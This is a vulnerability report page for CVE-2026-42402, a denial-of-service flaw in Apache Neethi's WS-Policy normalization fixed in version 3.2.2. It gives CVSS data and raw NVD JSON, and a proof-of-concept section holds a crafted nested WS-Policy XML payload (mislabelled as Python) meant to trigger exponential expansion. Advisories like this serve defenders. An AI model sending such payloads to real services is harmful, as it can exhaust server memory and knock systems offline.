Security Vulnerability Report
中文
CVE-2026-42402 CVSS 7.5 HIGH

CVE-2026-42402

Published: 2026-05-01 09:16:17
Last Modified: 2026-05-01 18:09:00

Description

Apache Neethi is vulnerable to a Denial of Service attack through algorithmic complexity in policy normalization. Specially crafted WS-Policy documents can trigger an exponential Cartesian cross-product expansion during the normalization process, causing unbounded memory allocation that exhausts the JVM heap. This occurs when the normalization process generates an excessive number of policy alternatives without bounds, leading to runtime memory exhaustion. Users should upgrade to 3.2.2 which limits the maximum number of normalized policy alternatives.

CVSS Details

CVSS Score
7.5
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

Configurations (Affected Products)

cpe:2.3:a:apache:neethi:*:*:*:*:*:*:*:* - VULNERABLE
Apache Neethi < 3.2.2

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
<!-- Malicious WS-Policy document to trigger DoS --> <wsp:Policy xmlns:wsp="http://schemas.xmlsoap.org/ws/2004/09/policy"> <wsp:All> <wsp:ExactlyOne> <!-- Nested structures causing Cartesian product expansion --> <wsp:All>A</wsp:All> <wsp:All>B</wsp:All> </wsp:ExactlyOne> <wsp:ExactlyOne> <wsp:All>C</wsp:All> <wsp:All>D</wsp:All> </wsp:ExactlyOne> <!-- Repeat nested ExactlyOne/All blocks to increase complexity --> <wsp:ExactlyOne> <wsp:All>E</wsp:All> <wsp:All>F</wsp:All> </wsp:ExactlyOne> </wsp:All> </wsp:Policy>

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-42402", "sourceIdentifier": "[email protected]", "published": "2026-05-01T09:16:16.980", "lastModified": "2026-05-01T18:08:59.950", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Apache Neethi is vulnerable to a Denial of Service attack through algorithmic complexity in policy normalization. Specially crafted WS-Policy documents can trigger an exponential Cartesian cross-product expansion during the normalization process, causing unbounded memory allocation that exhausts the JVM heap. This occurs when the normalization process generates an excessive number of policy alternatives without bounds, leading to runtime memory exhaustion.\n\nUsers should upgrade to 3.2.2 which limits the maximum number of normalized policy alternatives."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-400"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:apache:neethi:*:*:*:*:*:*:*:*", "versionEndExcluding": "3.2.2", "matchCriteriaId": "919C93DA-F5F7-4F2B-AD9B-C3BD46065619"}]}]}], "references": [{"url": "https://lists.apache.org/thread/p826j0phhmr9f83wzpmys1y0bdfrr2q4", "source": "[email protected]", "tags": ["Mailing List", "Vendor Advisory"]}, {"url": "http://www.openwall.com/lists/oss-security/2026/05/01/6", "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": ["Mailing List", "Third Party Advisory"]}]}}